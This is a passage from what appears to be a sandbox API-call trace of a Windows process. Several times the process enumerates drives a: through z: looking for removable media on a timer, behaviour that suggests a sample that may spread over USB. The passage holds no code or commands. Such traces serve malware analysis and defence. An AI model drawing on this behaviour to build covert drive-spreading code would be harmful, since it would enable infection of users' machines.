dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0218.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0218.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.590] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.590] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.591] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.591] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0218.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.592] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.592] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.592] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.592] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.592] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.593] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.593] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.593] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.593] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.594] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.594] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.594] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.594] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.595] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.595] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.595] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.595] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.595] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.596] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.596] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.596] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.596] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.596] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.597] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.597] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.597] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.597] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0218.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0218.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0218.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.600] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.600] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.600] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.600] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0218.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.601] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.601] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.601] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.601] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.602] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.602] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.602] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.603] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.603] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.605] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.605] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.605] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.606] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.606] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.606] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.606] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.606] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.607] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.607] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.607] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.607] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.607] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.608] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.609] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.609] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.609] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0218.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.610] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.610] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.610] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.610] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.611] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.611] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0218.611] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0218.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.612] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.613] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.613] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.614] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.614] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.614] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.614] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.615] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.615] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.615] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.615] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.615] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.616] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.616] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.616] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.616] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.616] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.617] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.617] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.617] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.617] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.617] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.618] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.619] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.619] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, 